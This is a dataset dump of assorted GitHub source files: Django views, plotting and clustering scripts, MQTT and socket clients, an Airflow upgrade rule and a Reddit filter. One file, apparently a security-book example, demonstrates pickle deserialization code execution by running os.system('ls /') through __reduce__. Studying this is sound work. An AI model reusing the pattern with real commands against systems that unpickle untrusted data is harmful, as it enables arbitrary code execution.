max_stars_repo_path (string, lengths 3-269) | max_stars_repo_name (string, lengths 4-119) | max_stars_count (int64, 0-191k) | id (string, lengths 1-7) | content (string, lengths 6-1.05M) | score (float64, 0.23-5.13) | int_score (int64, 0-5) |
---|---|---|---|---|---|---|
setup.py | fartbagxp/certspotter-api | 1 | 12786751 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from setuptools import setup
from setuptools.command.install import install
VERSION = "1.0.12"
def readme():
"""print long description"""
with open('README.md') as f:
return f.read()
setup(name='certspotter',
version=VERSION,
description='sslmate CertSpotter API',
long_description=readme(),
long_description_content_type="text/markdown",
url="https://github.com/fartbagxp/certspotter-api",
author='<NAME>',
author_email='<EMAIL>',
py_modules=['certspotter'],
packages=['certspotter'],
package_dir={'certspotter': 'src/certspotter'},
license='MIT')
| 1.65625 | 2 |
services/schema.py | antti-mikael/open-city-profile | 0 | 12786752 | <reponame>antti-mikael/open-city-profile
import graphene
from django.db.utils import IntegrityError
from django.utils.translation import ugettext_lazy as _
from graphene_django.types import DjangoObjectType
from graphql import GraphQLError
from graphql_jwt.decorators import login_required
from .consts import SERVICE_TYPES
from .models import Service
class ServiceType(DjangoObjectType):
type = graphene.Field(graphene.String, source="service_type")
class Meta:
model = Service
fields = ("created_at",)
AllowedServiceType = graphene.Enum(
"type", [(st[0].upper(), st[0]) for st in SERVICE_TYPES]
)
class ServiceInput(graphene.InputObjectType):
type = AllowedServiceType()
class AddService(graphene.Mutation):
class Arguments:
service = ServiceInput(required=True)
service = graphene.Field(ServiceType)
@login_required
def mutate(self, info, **kwargs):
service_data = kwargs.pop("service")
service_type = service_data.get("type")
try:
service = Service.objects.create(
profile=info.context.user.profile, service_type=service_type
)
return AddService(service=service)
except IntegrityError:
raise GraphQLError(_("Service already exists for this profile!"))
class Mutation(graphene.ObjectType):
add_service = AddService.Field()
| 2.234375 | 2 |
search/views.py | isi-metaphor/propstore-gui | 0 | 12786753 | <filename>search/views.py
# coding: utf-8
# Copyright (C) University of Southern California (http://usc.edu)
# Author: <NAME> <<EMAIL>>
# URL: <http://nlg.isi.edu/>
# For more information, see README.md
# For license information, see LICENSE
import json
import logging
import microidx
import traceback
from microidx import MicroIndex
from django.http import HttpResponse
from django.shortcuts import render_to_response
logger = logging.getLogger(__name__)
def load_index(path):
try:
index = MicroIndex(path)
return index
except Exception:
return None
indexes = {
"eng": (load_index("index_eng.ldb"), "English"),
"eng_gen": (load_index("index_eng_gen.ldb"), "English (generalized)"),
"rus": (load_index("index_rus.ldb"), "Russian"),
"rus_gen": (load_index("index_rus_gen.ldb"), "Russian (generalized)"),
"spa": (load_index("index_spa.ldb"), "Spanish"),
"spa_gen": (load_index("index_spa_gen.ldb"), "Spanish (generalized)"),
}
def json_response(json_dict):
return HttpResponse(json.dumps(json_dict), status=200, content_type="application/json")
def home(request):
return render_to_response("index.html", {})
def about(request):
return render_to_response("about.html", {})
W_NONE = {"v": "<NONE>", "p":None, "w":[], "t":0}
W_EMPTY = {"v": "<->", "p":None, "w":[], "t":0}
def format_arg(query_words, arg, max_len=16):
if arg == "<NONE>":
return W_NONE
if arg == "<->":
return W_EMPTY
words = arg.split("||")
lastw_pos = words[-1].split("-")
if len(lastw_pos) > 2:
lastw = "-".join(lastw_pos[:-1])
pos = lastw_pos[-1]
else:
lastw, pos = lastw_pos
words[-1] = lastw
trimmed = 0
if len(words) == 1:
visible = words[0]
else:
filtered = list(filter(lambda w: w in query_words, words))
if len(filtered) == 0:
filtered = words
elif len(filtered) != len(words):
trimmed = 1
visible = filtered[0]
for w in filtered[1:]:
if len(visible) >= max_len:
trimmed = 1
break
visible += ", "
visible += w
return {
"v": visible,
"p": pos,
"w": words,
"t": trimed,
}
def format_triples(query_words, triples):
result = []
for rel_type, a1, a2, a3, a4, a5, tr_fr, tr_no in triples:
result.append({
"t": rel_type,
"n": tr_no,
"f": tr_fr,
"a1": format_arg(query_words, a1),
"a2": format_arg(query_words, a2),
"a3": format_arg(query_words, a3),
"a4": format_arg(query_words, a4),
"a5": format_arg(query_words, a5),
})
return result
def find(request):
query = request.GET.get("query", "").encode("utf-8")
index = request.GET.get("index", None)
mfreq = request.GET.get("mfreq", "0")
rtype = request.GET.get("rtype", None)
rpage = request.GET.get("rpage", "1")
page_size = 256
freq = MicroIndex.parse_frequency(mfreq)
rpage = int(rpage)
logging.info("%r\t%r\t%r\t%r\t%r" % (query, index, mfreq, rtype, rpage))
if index is None or index not in indexes:
result = {
"error": True,
"error_code": 1,
"error_msg": "Index key '%r' not found." % index,
"found_triples": [],
"total_triples": 0,
"page_size": page_size,
"pages": 0,
"page": 0,
"index": index,
"mfreq": str(freq),
"rtype": rtype,
"query": str(query),
"query_words": [],
"url": request.build_absolute_uri(),
}
logging.error("Index key '%r' not found." % index)
return json_response(result)
mi_index = indexes[index][0]
try:
query = mi_index.parse_query(query)
except microidx.MicroIndexQueryParsingError:
error_msg = traceback.format_exc()
result = {
"error": True,
"error_code": 2,
"error_msg": "Error while parsing query: %r" % error_msg,
"found_triples": [],
"total_triples": 0,
"page_size": page_size,
"pages": 0,
"page": 0,
"index": index,
"mfreq": str(freq),
"rtype": rtype,
"query": str(query),
"query_words": [],
"url": request.build_absolute_uri(),
}
logging.error("Error while parsing query: %r" % error_msg)
return json_response(result)
query_words = [sq[0] for sq in query]
try:
page = int(rpage) - 1
if page < 0:
page = 0
offset = page * page_size
result_page, result_size, offset = mi_index.find(query,
limit=page_size,
offset=offset,
rel_type=rtype,
freq=freq,
)
for i, t in enumerate(result_page):
t[-1] = int(t[-1])
t.append(i + offset + 1)
pages = result_size // page_size + 1
result = {
"error": False,
"error_code": None,
"error_msg": None,
"found_triples": format_triples(query_words, result_page),
"total_triples": result_size,
"page_size": page_size,
"pages": pages,
"page": rpage,
"index": index,
"mfreq": str(freq),
"rtype": rtype,
"query": str(query),
"query_words": query_words,
"url": request.build_absolute_uri(),
}
except microidx.MicroIndexQueryExecutionError:
error_msg = traceback.format_exc()
result = {
"error": True,
"error_code": 3,
"error_msg": "Error while executing query: %r" % error_msg,
"found_triples": [],
"total_triples": 0,
"page_size": page_size,
"pages": 0,
"page": 0,
"index": index,
"mfreq": str(freq),
"rtype": rtype,
"query": query,
"query_words": query_words,
"url": request.build_absolute_uri(),
}
logging.error("Error while executing query: %r" % error_msg)
return json_response(result)
logging.info("Found %d results. Returned %d starting from %d." % (result_size, page_size, offset))
return json_response(result)
| 1.914063 | 2 |
coursera/course1-diving-in-python/week5/examples/socket_client.py | akrisanov/python_notebook | 3 | 12786754 | <filename>coursera/course1-diving-in-python/week5/examples/socket_client.py
import socket
sock = socket.socket()
sock.connect(("127.0.0.1", 9000))
# ^ one-liner: sock = socket.create_connection(("127.0.0.1", 9000))
sock.sendall("ping".encode("utf8"))
sock.close()
| 3.703125 | 4 |
airflow/upgrade/rules/chain_between_dag_and_operator_not_allowed_rule.py | shrutimantri/airflow | 0 | 12786755 | <reponame>shrutimantri/airflow
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import re
from airflow import conf
from airflow.upgrade.rules.base_rule import BaseRule
from airflow.utils.dag_processing import list_py_file_paths
class ChainBetweenDAGAndOperatorNotAllowedRule(BaseRule):
title = "Chain between DAG and operator not allowed."
description = "Assigning task to a DAG using bitwise shift (bit-shift) operators are no longer supported."
def _change_info(self, file_path, line_number):
return "{} Affected file: {} (line {})".format(
self.title, file_path, line_number
)
def _check_file(self, file_path):
problems = []
with open(file_path, "r") as file_pointer:
lines = file_pointer.readlines()
python_space = r"\s*\\?\s*\n?\s*"
# Find all the dag variable names.
dag_vars = re.findall(r"([A-Za-z0-9_]+){}={}DAG\(".format(python_space, python_space),
"".join(lines))
history = ""
for line_number, line in enumerate(lines, 1):
# Someone could have put the bitshift operator on a different line than the dag they
# were using it on, so search for dag >> or << dag in all previous lines that did
# not contain a logged issue.
history += line
matches = [
re.search(r"DAG\([^\)]+\){}>>".format(python_space), history),
re.search(r"<<{}DAG\(".format(python_space), history)
]
for dag_var in dag_vars:
matches.extend([
re.search(r"(\s|^){}{}>>".format(dag_var, python_space), history),
re.search(r"<<\s*{}{}".format(python_space, dag_var), history),
])
if any(matches):
problems.append(self._change_info(file_path, line_number))
# If we found a problem, clear our history so we don't re-log the problem
# on the next line.
history = ""
return problems
def check(self):
dag_folder = conf.get("core", "dags_folder")
file_paths = list_py_file_paths(directory=dag_folder, include_examples=False)
problems = []
for file_path in file_paths:
problems.extend(self._check_file(file_path))
return problems
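# Illustrative sketch (hypothetical DAG snippet, not part of the original rule):
# a file containing
#   dag = DAG('example_dag')
#   dag >> some_task
# defines the variable name 'dag' via the DAG(...) pattern searched for above,
# so the "dag >>" bit-shift on the second line matches and the rule reports the
# file path and line number.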
| 1.976563 | 2 |
pdfs_evolution_graphs.py | aherrera3/thesis | 0 | 12786756 | """
Script for the evolution gif of the pdfs obtained with qcdnum.
The pdfs obtained by the DGLAP evolution equations, using qcdnum, are stored in files, containing each one a fixed q2 energy scale.
The output files with the pdfs and x values are stored in the directory named output, inside qcdnum.
Those output files follows the following convention: nameCxxFile_q2_energyscale.csv
"""
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import pandas as pd
import glob
from PIL import Image
import os
# to delete the old images
os.system("rm imgs/*.png imgs/*.gif")
# url of the directory where the output files of qcdnum script are stored.
output_directory_url = "/opt/qcdnum-17-01-14/output/"
save_imgs_url = "imgs/"
names = []
plt.rcParams.update({"font.size":13})
sns.set_style("darkgrid")
# for each .csv output file
for csv in glob.glob(output_directory_url + "*.csv"):
print(csv)
array = csv.split("_")
q = float(array[2][:-4])
dataset = pd.read_csv(csv, delimiter=" ")
dataset = dataset.set_index("x")
names.append(int(q*100))
plt.figure()
lp = sns.scatterplot(data=dataset.iloc[:,:]) #, palette=['orange']
lp.set(xscale="log")
lp.text(0.78, 1.2, r'$Q^2 = 2.56$GeV$^2$', fontsize=10)
plt.ylabel("$x$pdf")
plt.xlabel("$x$")
plt.title(f"$Q^2$ = {q:.2e} $GeV^2$")
plt.ylim((0.0, 1.0))
plt.xlim((10e-3, 1))
plt.savefig(save_imgs_url + str(int(q*100)) + ".png", dpi=300)
names.sort()
# Create the frames
frames = []
imgs = [save_imgs_url + str(x) + ".png" for x in names]
for i in imgs:
new_frame = Image.open(i)
frames.append(new_frame)
# Save into a GIF file that loops forever
frames[0].save(save_imgs_url+'pdfs_evolution_gif.gif', format='GIF',
append_images=frames[1:],
save_all=True,
duration=10, loop=0) | 2.703125 | 3 |
WindmillProject/models/K-means.py | Nienkedn/Nieuwsanalyse8 | 0 | 12786757 | <filename>WindmillProject/models/K-means.py<gh_stars>0
from sklearn.feature_extraction.text import TfidfVectorizer
from stop_words import get_stop_words
from sklearn.cluster import KMeans
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.metrics import adjusted_rand_score
from collections import Counter
# These are the csv files we are going to use for our script
omroepzeeland = open("../Data/omroep_zeeland.csv", mode="r", encoding="utf-16")
nu = list(open("../Data/nu_nl.csv", mode="r", encoding="utf-16"))[1:]
tweets = open("../Data/tweets.csv", mode="r", encoding="utf-16")
# The csv files will be passed through and any stop words in the texts will be removed from the resulting tokens. The text is then converted to a matrix of TF-IDF features.
stop_words = get_stop_words('dutch')
my_stop_words = (["null", "http", "bit", "www", "https", "html", "ly", "nl", "com", "origin", "Timestamp", "Content", "Title", "Comment_count", "Retweet_count", "twitter", "000", "10", "11", "12", "13",
"14", "17", "rtvu"])
vectorizer = TfidfVectorizer(stop_words = stop_words + my_stop_words)
# X = vectorizer.fit_transform(omroepzeeland)
Y = vectorizer.fit_transform(nu)
# Z = vectorizer.fit_transform(tweets)
terms = vectorizer.get_feature_names()
# Clusters the data in groups of equal variance, minimizing a criterion known as the inertia or within-cluster sum-of-squares
true_k = 5
model = KMeans(n_clusters=true_k, init='k-means++', max_iter=1000, n_init=10, random_state=5)
# model.fit(X)
model.fit(Y)
# model.fit(Z)
# Print the results
print("Top terms per cluster:")
order_centroids = model.cluster_centers_.argsort()[:, ::-1]
for i in range(true_k):
print("\n""Cluster %d:" % i),
for ind in order_centroids[i, :10]:
print(' %s' % terms[ind]),
# Explanation of the model, script and TFIDF
# We configured the script so that five clusters are built from the three sources (nu.nl, twitter and omroepzeeland). First the stop words are filtered out of the three sources. Then, by means of
# term frequency-inverse document frequency aka TFIDF, every word is given a score to indicate how important the word is for the text. That information is used by the K-means algorithm
# to group the most important words into clusters. The most important words end up in cluster 1 and the less important words in the last cluster
print(Y)
print(vectorizer.get_feature_names())
# print(pd.DataFrame(X.toarray(), columns=vectorizer.get_feature_names()))
# Work in progress, see http://jonathansoma.com/lede/foundations/classes/text%20processing/tf-idf/
word1 = 'windmolens'
word2 = 'energie'
xdata = model.cluster_centers_[:,vectorizer.vocabulary_[word1]]
ydata = model.cluster_centers_[:,vectorizer.vocabulary_[word2]]
plt.scatter(xdata, ydata, s=1)
for clusternum, (xcoord,ycoord) in enumerate(zip(xdata, ydata)):
plt.text(xcoord, ycoord, str(clusternum))
plt.title('TFIDF score in cluster')
plt.xlabel(word1)
plt.ylabel(word2)
plt.show()
print(Counter(model.labels_))
nu1 = [text for clusternum, text in zip(model.labels_,nu) if clusternum == 3]
print(nu1)
# regex for the token pattern
# make a word cloud of those words and select the distinguishing words
| 3.34375 | 3 |
Project Euler/general.py | pybae/etc | 0 | 12786758 | <reponame>pybae/etc
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# A general purpose file including several blanket functions to simplify Project
# Euler code
import numpy
import math
import cProfile
import pstats
import StringIO
def prime(n):
return filter(lambda num: (num % \
numpy.arange(2, 1+int(math.sqrt(num)))).all(), range(2, n+1))
pr = cProfile.Profile()
pr.enable()
array = prime(1000)
pr.disable()
s = StringIO.StringIO()
sortby = 'cumulative'
ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
ps.print_stats()
| 2.421875 | 2 |
ghostwriter/rolodex/migrations/0013_projectsubtask_marked_complete.py | bbhunter/Ghostwriter | 601 | 12786759 | # Generated by Django 3.0.10 on 2021-02-11 21:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rolodex', '0012_auto_20210211_1853'),
]
operations = [
migrations.AddField(
model_name='projectsubtask',
name='marked_complete',
field=models.DateField(blank=True, help_text='Date the task was marked complete', null=True, verbose_name='Marked Complete'),
),
]
| 1.492188 | 1 |
resources/drive.py | MujyKun/IreneAPI | 1 | 12786760 | <reponame>MujyKun/IreneAPI<gh_stars>1-10
from __future__ import print_function
import pickle
import os.path
import io
# noinspection PyPackageRequirements
from googleapiclient.http import MediaIoBaseDownload
# noinspection PyPackageRequirements
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
# noinspection PyPackageRequirements
from google.auth.transport.requests import Request
def get_drive_connection():
scopes = ['https://www.googleapis.com/auth/drive']
cred = None
if os.path.exists(f'token.pickle'):
with open(f'token.pickle', 'rb') as token:
try:
cred = pickle.load(token)
except Exception as e:
print(e)
# If there are no (valid) credentials available, let the user log in.
if not cred or not cred.valid:
if cred and cred.expired and cred.refresh_token:
cred.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', scopes)
cred = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(f'token.pickle', 'wb') as token:
pickle.dump(cred, token)
drive_service = build('drive', 'v3', credentials=cred)
return drive_service
drive = get_drive_connection()
def get_file_type(file_id):
"""Get the file type of a drive file.
ex: image.jpeg or media.mp4"""
file_data = get_file_data(file_id)
file_type = file_data.get('mimeType')
if file_type:
return file_type.replace('/', '.')
return file_data.get('mimeType')
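# Sketch of the transformation above (illustrative value): a file whose Drive
# metadata reports mimeType "image/jpeg" is returned as "image.jpeg" after the
# replace('/', '.') call.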
def get_file_data(file_id):
"""Get the file data of a drive file."""
return drive.files().get(fileId=file_id).execute()
def download_media(file_id, file_location):
media = drive.files().get_media(fileId=file_id)
fh = io.BytesIO()
downloader = MediaIoBaseDownload(fh, media)
done = False
while done is False:
status, done = downloader.next_chunk()
# print percentage of download
print("Download %d%%." % int(status.progress() * 100))
with open(file_location, 'wb') as f:
fh.seek(0) # go to start of stream
f.write(fh.read())
try:
fh.close()
except Exception as e:
print(e, "--download")
| 2.734375 | 3 |
mqtt/ping.py | Laged/test-python-ping-mqtt | 0 | 12786761 | <gh_stars>0
import socket
from time import sleep
import paho.mqtt.client as mqtt
hostname = socket.gethostname()
broker = 'broker.hivemq.com'
port = 1883
default_user = hostname
default_pw = None
default_topic = '/ping-mqtt/' + hostname
default_msg = 'ping'
default_qos = 0
ping_interval = 1
running = True
subscribed = False
def __ping_loop(client):
while running:
if subscribed:
print 'Pinging',default_topic
client.publish(default_topic, default_msg)
sleep(ping_interval)
def __on_connect(client, userdata, flags, rc):
if rc == 0:
username = userdata['user'] if 'user' in userdata else None
print 'Connection',str(username),'to',str(client._host)+':'+str(client._port),'OK'
print 'Subscribing to',str(default_topic),'with QoS',str(default_qos)
client.subscribe(default_topic, default_qos)
else:
print 'Connection failed with code',rc
def __on_message(client, userdata, msg):
print 'Message ' + msg.topic+': '+str(msg.payload)
def __on_subscribe(client, userdata, mid, granted_qos):
topic = userdata['topic'] if 'topic' in userdata else None
print 'Subscription to',topic,'with QoS',str(granted_qos),'OK'
global subscribed
subscribed = True
def init():
print 'Initializing client that pings a MQTT broker'
defaults = {
'user':default_user,
'password':<PASSWORD>,
'topic': default_topic,
'msg': default_msg
}
client = mqtt.Client()
client.username_pw_set(default_user, default_pw)
client.user_data_set(defaults)
client.on_connect = __on_connect
client.on_message = __on_message
client.on_subscribe = __on_subscribe
print 'Connecting',hostname,'to',broker+':'+str(port)
client.loop_start()
client.connect(broker, port)
__ping_loop(client)
if __name__ == '__main__':
init()
| 2.59375 | 3 |
dwh/indicator_lib.py | LaudateCorpus1/openmrs-fhir-analytics | 0 | 12786762 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of functions to work with Spark DataFrames containing FHIR resources.
See test_spark.ipynb for real examples of how to create/use these functions.
"""
# TODO move common and query related parts to `query_lib.py` and only keep
# indicator calculation logic that is independent of Spark here.
from typing import List
from datetime import datetime
from dateutil.parser import parse as parse_date
import pandas as pd
import common
import query_lib
def _find_age_band(birth_date: str, end_date: datetime) -> str:
"""Given the birth date, finds the age_band for PEPFAR disaggregation."""
birth = parse_date(birth_date)
age = int((end_date - birth).days / 365.25)
if age < 1:
return '0-1'
if age <= 4:
return '1-4'
if age <= 9:
return '5-9'
if age <= 14:
return '10-14'
if age <= 19:
return '15-19'
if age <= 24:
return '20-24'
if age <= 49:
return '25-49'
return '50+'
def _agg_buckets(birth_date: str, gender: str, end_date: datetime) -> List[str]:
"""Generates the list of all PEPFAR disaggregation buckets."""
age_band = _find_age_band(birth_date, end_date)
return [age_band + '_' + gender, 'ALL-AGES_' + gender,
age_band + '_ALL-GENDERS', 'ALL-AGES_ALL-GENDERS']
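# Worked example based on the logic above (dates are illustrative): a patient
# born on 2000-01-01 with gender 'F' and an end date of 2021-01-01 is about 21
# years old, so _find_age_band returns '20-24' and _agg_buckets returns
# ['20-24_F', 'ALL-AGES_F', '20-24_ALL-GENDERS', 'ALL-AGES_ALL-GENDERS'].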
def _gen_counts_and_ratio(temp_df: pd.DataFrame, end_date: datetime,
ind_name: str) -> pd.DataFrame:
"""Generates aggregated dataframe when supplied with patient-level df"""
temp_df['buckets'] = temp_df.apply(
lambda x: _agg_buckets(x.birthDate, x.gender, end_date), axis=1)
temp_df_exp = temp_df.explode('buckets')
temp_df_exp = temp_df_exp.groupby(
[ind_name, 'buckets'], as_index=False).count()[[
ind_name, 'buckets', 'patientId']].rename(
columns={'patientId': ind_name + '_count'})
# calculate ratio
num_patients = len(temp_df.index)
temp_df_exp[ind_name + '_ratio'] = temp_df_exp[
ind_name + '_count'] / num_patients
return temp_df_exp
def calc_TX_PVLS(patient_agg_obs: pd.DataFrame, VL_code: str,
failure_threshold: int, end_date_str: str = None) -> pd.DataFrame:
"""Calculates TX_PVLS indicator with its corresponding disaggregations.
Args:
patient_agg_obs: An output from `patient_query.find_patient_aggregates()`.
VL_code: The code for viral load values.
failure_threshold: VL count threshold of failure.
end_date_str: The string representation of the last date as 'YYYY-MM-DD'.
Returns:
The aggregated DataFrame with age/gender buckets.
"""
end_date = datetime.today()
if end_date_str:
end_date = parse_date(end_date_str)
temp_df = patient_agg_obs[(patient_agg_obs['code'] == VL_code)].copy()
# Note the above copy is used to avoid setting a new column on a slice next:
temp_df['latest_vl_value'] = temp_df['last_value'].astype(float)
temp_df['sup_VL'] = (temp_df['latest_vl_value'] < failure_threshold)
temp_df = _gen_counts_and_ratio(temp_df, end_date, 'sup_VL')
return temp_df
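# Minimal usage sketch (the VL code and column values below are assumptions; the
# column names mirror what the function reads above):
#   agg = pd.DataFrame({
#       'patientId': ['p1', 'p2'],
#       'code': ['856', '856'],
#       'last_value': ['150', '2500'],
#       'birthDate': ['1990-05-01', '2010-02-01'],
#       'gender': ['female', 'male'],
#   })
#   calc_TX_PVLS(agg, VL_code='856', failure_threshold=1000,
#                end_date_str='2021-01-01')
# Here the first patient counts as virally suppressed (150 < 1000), the second
# does not, and counts/ratios are reported per age/gender bucket.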
def calc_TX_NEW(patient_agg_obs: pd.DataFrame, ARV_plan: str,
start_drug: List[str], end_date_str: str = None) -> pd.DataFrame:
"""Calculates TX_NEW indicator with its corresponding disaggregations.
TX_NEW indicator counts the number of adults and children newly enrolled
on antiretroviral therapy (ART) prior to the provided end-date
Args:
patient_agg_obs: A DataFrame generated by `patient_query.find_patient_aggregates()`.
ARV_plan: The concept question code for ANTIRETROVIRAL PLAN
start_drug: The concept answer codes for START DRUG
end_date_str: The string representation of the last date as 'YYYY-MM-DD'.
Returns:
The aggregated DataFrame with age/gender buckets.
"""
end_date = datetime.today()
if end_date_str:
end_date = parse_date(end_date_str)
temp_df = patient_agg_obs[(patient_agg_obs['code'] == ARV_plan)].copy()
# Note the above copy is used to avoid setting a new column on a slice next:
temp_df['TX_NEW'] = (temp_df['last_value_code'].isin(start_drug))
temp_df = _gen_counts_and_ratio(temp_df, end_date, 'TX_NEW')
return temp_df | 2.546875 | 3 |
chapter11/code/pickle_safe_chroot.py | gabrielmahia/ushuhudAI | 74 | 12786763 | import os
import pickle
from contextlib import contextmanager
class ShellSystemChroot(object):
def __reduce__(self):
# this will list contents of root / folder
return (os.system, ('ls /',))
@contextmanager
def system_chroot():
""" A simple chroot """
os.chroot('/')
yield
def serialize():
with system_chroot():
shellcode = pickle.dumps(ShellSystemChroot())
return shellcode
def deserialize(exploit_code):
with system_chroot():
pickle.loads(exploit_code)
if __name__ == '__main__':
shellcode = serialize()
print('Obtaining files...')
deserialize(shellcode)
| 2.78125 | 3 |
Heatmap.py | Ruhen-Bhuiyan/Logistic-regression-vs-SVM-vs-Decision-Tree-vs-Random-Forest | 0 | 12786764 | <filename>Heatmap.py
import pandas as pd
import numpy as np
from sklearn import preprocessing
from sklearn.metrics import confusion_matrix
from sklearn import svm
import itertools
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
import seaborn
get_ipython().run_line_magic('matplotlib', 'inline')
data = pd.read_csv("D:\\445\\KhidmahActuall.csv")
df = pd.DataFrame(data)
df_corr = df.corr()
plt.figure(figsize=(15,10))
seaborn.heatmap(df_corr, cmap="YlGnBu") # Displaying the Heatmap
seaborn.set(font_scale=2,style='white')
plt.title('Heatmap correlation')
plt.show()
| 3.125 | 3 |
Project Euler #1: Multiples of 3 and 5/Python.py | gitvy/Project-Euler | 0 | 12786765 | for i in range(int(input())):
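# Closed-form approach: l1, l2, l3 below are the largest multiples of 3, 5 and 15
# not exceeding n; the sum of the multiples of k up to lk is lk*(k+lk)/(2k), and
# the multiples of 15 are subtracted once to undo the double counting of numbers
# divisible by both 3 and 5.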
n = int(input()) -1
l1 = n - n%3
l2 = n - n%5
l3 = n - n%15
s1 = ((l1)*(3+l1))//6
s2 = ((l2)*(5+l2))//10
s3 = ((l3)*(15+l3))//30
print(s1+s2-s3)
| 3.171875 | 3 |
carim/configuration/mods/vanilla_plus_plus_map/model.py | schana/dayz-server-carim | 3 | 12786766 | <reponame>schana/dayz-server-carim<filename>carim/configuration/mods/vanilla_plus_plus_map/model.py<gh_stars>1-10
from collections import namedtuple
from carim.global_resources import locations
def get_markers():
return [Marker(
name=m[0],
icon=Icon.DEFAULT,
color=WHITE,
position=m[1],
active=True,
active_3d=True
) for m in locations.marks]
def get_config():
return {
'M_STATIC_MARKER_ARRAY': [m.get_config() for m in get_markers()],
'm_CanUse3DMarkers': 1,
'm_OwnPositionMarkerDisabled': 0,
'm_ForceMapItemOnly': 0
}
def get_admin_teleport_config():
return {
'm_TeleportLocations': [m.get_admin_teleport_config() for m in get_markers()]
}
class Marker:
def __init__(self, name, icon, color, position, active, active_3d):
self.name = name
self.icon = icon
self.color = color
self.position = position
self.active = active
self.active_3d = active_3d
def get_config(self):
return {
'M_MARKER_NAME': self.name,
'M_ICON_PATH': self.icon,
'M_COLOR': [self.color.r, self.color.g, self.color.b],
'M_POSITION': [self.position.x, 0, self.position.z],
'M_ISACTIVE': 1 if self.active else 0,
'M_IS_3D_ACTIVE': 1 if self.active_3d else 0
}
def get_admin_teleport_config(self):
return {
'm_Name': self.name,
'm_Position': [
self.position.x,
0,
self.position.z
]
}
Color = namedtuple('Color', ('r', 'g', 'b'))
WHITE = Color(255, 255, 255)
RED = Color(255, 0, 0)
GREEN = Color(0, 255, 0)
BLUE = Color(0, 0, 255)
class Icon:
DEFAULT = "VanillaPPMap\\GUI\\Textures\\CustomMapIcons\\waypointeditor_CA.paa"
| 1.945313 | 2 |
src/test_import.py | usdot-its-jpo-data-portal/canary-lambda | 0 | 12786767 | <gh_stars>0
import unittest
import os
class TestImports(unittest.TestCase):
def test_imports(self):
print('Temporary dummy import test for coverage config.')
import main | 1.679688 | 2 |
huobi/model/pricedepthevent.py | Wing-Lo/huobi_Python | 0 | 12786768 | <gh_stars>0
from huobi.model import *
class PriceDepthEvent:
"""
The price depth received by subscription of price depth.
:member
symbol: The symbol you subscribed.
timestamp: The UNIX formatted timestamp generated by server in UTC.
data: The price depth.
"""
def __init__(self):
self.symbol = ""
self.timestamp = 0
self.data = PriceDepth()
| 2.375 | 2 |
src/filters.py | git2samus/xpost-bot | 16 | 12786769 | class SubmissionFilter(object):
""" methods to determine whether a submission is relevant for reposting """
def __init__(self, settings):
""" store settings """
self.settings = settings
def _is_valid_submitter(self, submission):
""" returns True when the submission isn't from an ignored submitter or the submitter deleted his account """
ignored_submitters = self.settings['ignored_submitters']
if not submission.author:
return True # allow [deleted]
author_name = submission.author.name.lower()
return author_name not in ignored_submitters
def _is_valid_subreddit(self, submission):
""" returns True when the submission hasn't been done on an ignored subreddit """
ignored_subreddits = self.settings['ignored_subreddits']
subreddit_name = submission.subreddit.display_name.lower()
return subreddit_name not in ignored_subreddits
def _test_text(self, text, target_keywords=None, target_regexps=None):
""" returns True when 'text' contains any of the target_keywords or matches any of the target_regexps """
target_keywords = [] if target_keywords is None else target_keywords
target_regexps = [] if target_regexps is None else target_regexps
text = text.lower()
return any(
keyword in text for keyword in target_keywords
) or any(
regexp.search(text) for regexp in target_regexps
)
def _test_matches(self, submission):
""" returns True when the submission's title or selftext contains any of the matched_keywords or matches any of the matched_regexps """
matched_keywords = self.settings['matched_keywords']
matched_regexps = self.settings['matched_regexps']
match = self._test_text(submission.title, matched_keywords, matched_regexps)
if not match and submission.is_self:
match = self._test_text(submission.selftext, matched_keywords, matched_regexps)
return match
def _test_exclusions(self, submission):
""" returns True when the submission's title or selftext contains any of the excluded_keywords or matches any of the excluded_regexps """
excluded_keywords = self.settings['excluded_keywords']
excluded_regexps = self.settings['excluded_regexps']
excluded = self._test_text(submission.title, excluded_keywords, excluded_regexps)
if not excluded and submission.is_self:
excluded = self._test_text(submission.selftext, excluded_keywords, excluded_regexps)
return excluded
def filter_submission(self, submission):
""" determine whether this submission should be filtered or not, returns True when the sumission:
-isn't from an ignored submitter
-hasn't been posted on an ignored subreddit
-contains any of the matched_keywords or matches any of the matched_regexps
-doesn't contain any of the excluded_keywords or matches any of the excluded_regexps
"""
return all((
self._is_valid_submitter(submission),
self._is_valid_subreddit(submission),
self._test_matches(submission),
not self._test_exclusions(submission),
))
def filter_stream(self, stream):
""" apply self.filter_submission to each element of the stream """
for submission in stream:
if self.filter_submission(submission):
yield submission
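# Usage sketch (illustrative; the settings keys mirror those read above and the
# stream/submission objects stand in for praw objects):
#   settings = {
#       'ignored_submitters': ['some_bot'],
#       'ignored_subreddits': ['test'],
#       'matched_keywords': ['python'],
#       'matched_regexps': [],
#       'excluded_keywords': ['meta'],
#       'excluded_regexps': [],
#   }
#   submission_filter = SubmissionFilter(settings)
#   for submission in submission_filter.filter_stream(stream):
#       crosspost(submission)   # hypothetical repost handler
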